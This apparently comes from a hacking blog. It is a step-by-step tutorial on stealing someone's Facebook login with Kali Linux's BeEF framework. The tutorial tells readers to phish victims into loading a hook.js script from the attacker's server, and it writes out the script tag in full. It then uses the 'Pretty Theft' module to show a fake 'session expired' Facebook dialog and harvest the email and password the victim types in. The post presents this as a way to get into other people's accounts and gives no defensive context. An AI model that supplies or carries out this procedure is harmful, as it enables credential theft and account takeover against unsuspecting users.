How to hack Facebook account using Kali Linux

 Facebook is far from unhackable, but to do so, you will need some skills

If you have skill, luck, and knowledge of social engineering, you can get Facebook account credentials.

For this facebook hacking trick, you must have knowledge in kali linux as wll as basic understanding of “Networking”.

So here is steps, by using this you can probably gain access to someone's Facebook credentials very easily with this little trick.

Step 1 :

Install Kali linux

To install kali linux you need to download it from kali linux site, then make a bootable pendrive/DVD. You can dual boot this with your windows or mac OS.

Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.

Step 2 :

Open BeEF

Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.

Kali Linux BeEF tool

When you click on it, it starts BeEF by opening a terminal.

BeEF terminal

BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.

BeEF GUI login screen

You will then by greeted by BeEF's Getting “Started” screen.

BeEF's 'Getting Started'

Step 3 :

Attack On Victim's Browser

This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to “hook” their browser. This can be done in innumerable ways.

The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as “Click here for more information” or “Click here to see the video.” Use your imagination or you can use simply phishing methods.

The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser.

CODE/PROGRAM/EXAMPLE
<script src= "https://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>

Step 4 :

Send a Dialog Box to the User

When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the “Hooked Browsers” panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the “Commands” tab.

BeEF host details

Click on the “Commands” tab, then scroll down the “Modules Tree” until you come to “Social Engineering“ and click to expand it. It will display numerous social engineering modules. Click on “Pretty Theft,” which will open a “Module Results History” and “Pretty Theft” window.

This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.

BeEF commands

If we click on the “Dialog Type“ box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the “Execute” button the the bottom.

BeEF commands

Step 5 :

The Dialog Box Appears on the Target System

When you click “Execute” in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.

fake facebook login BeEF screen

Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.

fake facebook login BeEF screen

Step 6 :

Harvest the Credentials

Back on our system in the BeEf interface, we can see that the credentials appear in the “Command results” window. The victim has entered their email address “bookofXXXX@gmail.com” and their password “sweetbippy” and they have been captured and presented to you in BeEF.

BeEF screen with hacked facebook account pwd

Comments

Popular posts from this blog

HiddenEye Hacking Instagram With Kali Linux 2021 (Instagram Hack)